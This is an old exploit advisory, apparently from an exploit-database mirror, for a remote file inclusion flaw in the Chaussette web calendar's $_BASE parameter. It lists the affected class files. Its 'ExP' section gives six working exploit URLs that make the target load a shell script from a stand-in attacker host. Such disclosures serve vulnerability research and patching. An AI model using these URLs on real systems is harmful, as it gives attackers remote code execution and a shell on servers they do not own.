Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities

🗓️ 06 Dec 2006 00:00:00Reported by RootType

Chaussette Remote File Inclusion vulnerability in multiple files with _BASE paramete


                                                Chaussette Remote File Inclusion

CreW: ToXiC
Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip

Page Affect
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php

Problem Is :
$_BASE Not Declare;


ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php

Greatz: Str0ke

06 Dec 2006 00:00Current

7.1High risk

Vulners AI Score7.1

Chaussette &lt;= 080706 (_BASE) Remote File Include Vulnerabilities

Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities